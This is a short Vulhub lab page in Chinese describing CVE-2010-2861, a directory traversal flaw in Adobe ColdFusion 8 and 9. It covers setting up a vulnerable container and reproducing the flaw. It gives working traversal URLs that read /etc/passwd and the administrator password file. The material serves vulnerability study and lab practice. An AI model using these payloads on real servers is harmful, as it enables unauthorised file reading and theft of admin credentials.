Vulhub 文檔Adobe ColdFusion 文件讀取漏洞(CVE-2010-2861)
Adobe ColdFusion是美國Adobe公司的一款動態Web服務器產品,其運行的CFML(ColdFusion Markup Language)是針對Web應用的一種程序設計語言。
Adobe ColdFusion 8、9版本中存在一處目錄穿越漏洞,可導致未授權的用戶讀取服務器任意文件。
環境搭建
執行如下命令啟動Adobe CouldFusion 8.0.1版本服務器:
docker-compose up -d環境啟動可能需要1~5分鐘,啟動后,訪問http://your-ip:8500/CFIDE/administrator/enter.cfm,可以看到初始化頁面,輸入密碼admin,開始初始化整個環境。
漏洞復現
直接訪問http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en,即可讀取文件/etc/passwd:
讀取后臺管理員密碼http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en:
推薦文章: